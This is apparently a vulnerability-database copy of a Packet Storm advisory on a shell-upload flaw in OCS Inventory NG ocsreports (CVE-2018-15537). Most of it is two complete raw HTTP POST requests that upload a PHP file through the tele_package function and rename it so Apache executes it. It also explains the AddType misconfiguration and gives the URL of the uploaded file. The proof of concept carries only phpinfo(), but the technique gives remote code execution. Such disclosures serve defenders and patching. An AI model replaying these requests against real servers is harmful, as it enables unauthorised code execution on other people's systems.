Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSimon UvarovPACKETSTORM:150330
HistoryNov 14, 2018 - 12:00 a.m.

OCS Inventory NG ocsreports Shell Upload

2018-11-1400:00:00
Simon Uvarov
packetstormsecurity.com
195

0.002 Low

EPSS

Percentile

52.9%

JSON
`## Request 1  
  
This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory.  
  
POST /ocsreports/index.php?function=tele_package HTTP/1.1  
Host: 192.168.5.135  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package  
Content-Type: multipart/form-data; boundary=---------------------------491299511942  
Content-Length: 2836  
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="CSRF_10"  
  
8ab3df2f9a2078530027e74191af0b087429ad41  
-----------------------------491299511942  
Content-Disposition: form-data; name="document_root"  
  
/usr/share/ocsinventory-reports/ocsreports/  
-----------------------------491299511942  
Content-Disposition: form-data; name="timestamp"  
  
a.php.a  
-----------------------------491299511942  
Content-Disposition: form-data; name="NAME"  
  
dshasdgasga  
-----------------------------491299511942  
Content-Disposition: form-data; name="DESCRIPTION"  
  
asdgasdga  
-----------------------------491299511942  
Content-Disposition: form-data; name="OS"  
  
WINDOWS  
-----------------------------491299511942  
Content-Disposition: form-data; name="PROTOCOLE"  
  
HTTP  
-----------------------------491299511942  
Content-Disposition: form-data; name="PRIORITY"  
  
5  
-----------------------------491299511942  
Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip"  
Content-Type: application/x-zip-compressed  
  
<?php  
  
phpinfo();  
  
?>  
-----------------------------491299511942  
Content-Disposition: form-data; name="ACTION"  
  
EXECUTE  
-----------------------------491299511942  
Content-Disposition: form-data; name="ACTION_INPUT"  
  
asdgasdgasdg  
-----------------------------491299511942  
Content-Disposition: form-data; name="REDISTRIB_USE"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"  
  
d:\tele_ocs  
-----------------------------491299511942  
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"  
  
5  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_USER"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_TEXT"  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NEED_DONE_ACTION"  
  
0  
-----------------------------491299511942  
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"  
  
-----------------------------491299511942  
Content-Disposition: form-data; name="valid"  
  
Send  
-----------------------------491299511942  
Content-Disposition: form-data; name="digest_algo"  
  
MD5  
-----------------------------491299511942  
Content-Disposition: form-data; name="digest_encod"  
  
Hexa  
-----------------------------491299511942  
Content-Disposition: form-data; name="download_rep_creat"  
  
/var/www/html/download/server/  
-----------------------------491299511942--  
  
## Request 2  
  
This request renames the file to a.php.a-1 and also creates info file.  
  
POST /ocsreports/index.php?function=tele_package HTTP/1.1  
Host: 192.168.5.135  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package  
Content-Type: multipart/form-data; boundary=---------------------------4827543632391  
Content-Length: 3345  
Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="CSRF_13"  
  
53b6eab749060aa8cbe972e9c9a31ae148cf886b  
-----------------------------4827543632391  
Content-Disposition: form-data; name="tailleFrag"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="nbfrags"  
  
1  
-----------------------------4827543632391  
Content-Disposition: form-data; name="comment"  
  
asdgasdga  
-----------------------------4827543632391  
Content-Disposition: form-data; name="digest"  
  
b14f8d3b56fb10f2257f53ab32947a50  
-----------------------------4827543632391  
Content-Disposition: form-data; name="VALID_END"  
  
END  
-----------------------------4827543632391  
Content-Disposition: form-data; name="SIZE"  
  
347  
-----------------------------4827543632391  
Content-Disposition: form-data; name="document_root"  
  
/usr/share/ocsinventory-reports/ocsreports/  
-----------------------------4827543632391  
Content-Disposition: form-data; name="timestamp"  
  
a.php.a  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NAME"  
  
dshasdgasga  
-----------------------------4827543632391  
Content-Disposition: form-data; name="DESCRIPTION"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="OS"  
  
WINDOWS  
-----------------------------4827543632391  
Content-Disposition: form-data; name="PROTOCOLE"  
  
HTTP  
-----------------------------4827543632391  
Content-Disposition: form-data; name="PRIORITY"  
  
5  
-----------------------------4827543632391  
Content-Disposition: form-data; name="teledeploy_file"; filename=""  
Content-Type: application/octet-stream  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="ACTION"  
  
EXECUTE  
-----------------------------4827543632391  
Content-Disposition: form-data; name="ACTION_INPUT"  
  
asdgasdgasdg  
-----------------------------4827543632391  
Content-Disposition: form-data; name="REDISTRIB_USE"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT"  
  
d:\tele_ocs  
-----------------------------4827543632391  
Content-Disposition: form-data; name="REDISTRIB_PRIORITY"  
  
5  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_USER"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_TEXT"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_COUNTDOWN"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_CAN_ABORT"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NOTIFY_CAN_DELAY"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NEED_DONE_ACTION"  
  
0  
-----------------------------4827543632391  
Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT"  
  
-----------------------------4827543632391  
Content-Disposition: form-data; name="digest_algo"  
  
MD5  
-----------------------------4827543632391  
Content-Disposition: form-data; name="digest_encod"  
  
Hexa  
-----------------------------4827543632391  
Content-Disposition: form-data; name="download_rep_creat"  
  
/var/www/html/download/server/  
-----------------------------4827543632391--  
  
# Apache Config  
  
The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file:  
  
AddType application/x-httpd-php .php  
  
Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1  
Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext  
  
Regards,  
Simon Uvarov  
  
  
`

Related

debiancve 1
cve 1
openvas 1
zdt 1
prion 1
ubuntucve 1
debiancve
debiancve
CVE-2018-15537
2018-11-29 21:29:00
cve
cve
CVE-2018-15537
2018-11-29 21:29:00
openvas
openvas
OCS Inventory NG <= 2.5.0 Remote Shell Upload Vulnerability
2018-11-23 00:00:00
zdt
zdt
OCS Inventory NG ocsreports Shell Upload Vulnerability
2018-11-14 00:00:00
prion
prion
Unrestricted file upload
2018-11-29 21:29:00
ubuntucve
ubuntucve
CVE-2018-15537
2018-11-29 00:00:00

0.002 Low

EPSS

Percentile

52.9%

JSON
Related for PACKETSTORM:150330
debiancve1cve1openvas1zdt1prion1ubuntucve1